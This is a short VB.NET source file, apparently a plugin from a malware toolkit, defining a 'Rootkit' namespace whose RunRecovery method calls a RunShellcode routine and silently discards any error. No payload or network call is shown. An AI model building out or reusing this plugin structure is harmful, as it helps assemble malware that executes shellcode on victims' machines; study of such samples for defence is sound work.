21 lines
411 B
VB.net
21 lines
411 B
VB.net
Imports System
|
|||
|
|
Imports Microsoft.VisualBasic
|
||
|
|
|
||
|
|
Namespace Rootkit
|
||
|
|
Public Class Plugin
|
||
|
|
Public Shared Function RunRecovery(Method As Integer) As String
|
||
|
|
Dim text As String
|
||
|
|
Try
|
||
|
|
Select Case Method
|
||
|
|
Case 8
|
||
|
|
Rootkit.RunShellcode()
|
||
|
|
End Select
|
||
|
|
text = Nothing
|
||
|
|
Catch ex As Exception
|
||
|
|
text = Nothing
|
||
|
|
End Try
|
||
|
|
Return text
|
||
|
|
End Function
|
||
|
|
End Class
|
||
|
|
End Namespace
|